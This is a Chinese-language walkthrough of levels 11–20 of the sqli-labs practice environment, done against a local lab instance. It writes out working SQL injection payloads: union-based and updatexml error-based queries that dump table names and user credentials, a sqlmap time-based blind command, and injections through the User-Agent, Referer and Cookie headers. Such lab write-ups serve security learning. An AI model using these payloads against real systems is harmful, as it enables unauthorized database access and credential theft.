sqli-labs闖關11-20關——通關記錄

Less-11

首先嚐試正常登入，based-String，使用admin登入

看上圖，測試欄位

admin' order by 2 #

兩個欄位

隨後嘗試閉合方式，明顯單引號報錯，猜測是單引號閉合

直接使用聯合查詢的方式進行

0' union select null,database()#    #查詢資料庫
0‘ union select null,group_concat(table_name) from information_schema.tables where table_schema='security'# #爆表
0‘ union select null,group_concat(column_name) from information_schema.columns where table_name='users'#    #爆欄位
0‘ union select null,group_concat(username,password) from security.users#   #爆欄位內容

結束

Less-12

測試閉合方式。為")閉合，剩下步驟和Less-11一樣

Less-13

正常登入無資料回顯，但是測試閉合方式')時報錯

可以使用報錯注入

admin') and (updatexml(1,concat(0x7e,(select database()),0x7e),1))# #查詢資料庫
admin') and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#  #爆表
admin') and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#     #爆欄位
admin') and (updatexml(1,concat(0x7e,(select group_concat(username,password) from security.users),0x7e),1))#    爆欄位內容

結束

Less-14

閉合方式為雙引號，其餘和Less-13類似

Less-15

標題是盲注，無論怎麼測試都沒有回顯，猜測是基於時間的盲注

直接利用sqlmap跑

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-15/" --data "uname=admin&passwd=admin&submit=Submit"  --technique T --dbs --batch

其中"uname=admin&passwd=admin&submit=Submit"是bp抓包的最後一行

成功，結束

Less-16

基於時間的盲注，也可直接採用sqlmap跑

Less-17

測試可知，在username處輸入時僅有顯示圖片發生變化，但是在password處輸入時會顯示報錯資訊，得知資料是單引號閉合

直接使用bp抓包後修改資料（利用報錯注入），send之後即可看見相應的內容

完成

Less-18

在兩個輸入框測試均無變化

bp抓包，可以發現修改user-agent後有回顯報錯，並且檢視原始碼發現是單引號閉合

keepb1ue' or updatexml(1,concat(0x7e,(database()),0x7e),0) or ' #將user-agent內容修改為此即可

Less-19

和上題類似，只是注入點從user-agnet變成了refer

Less-20

由題目得知是cookie注入

Cookie: uname=' union select 1,database(),6 or 1=1 #;

完成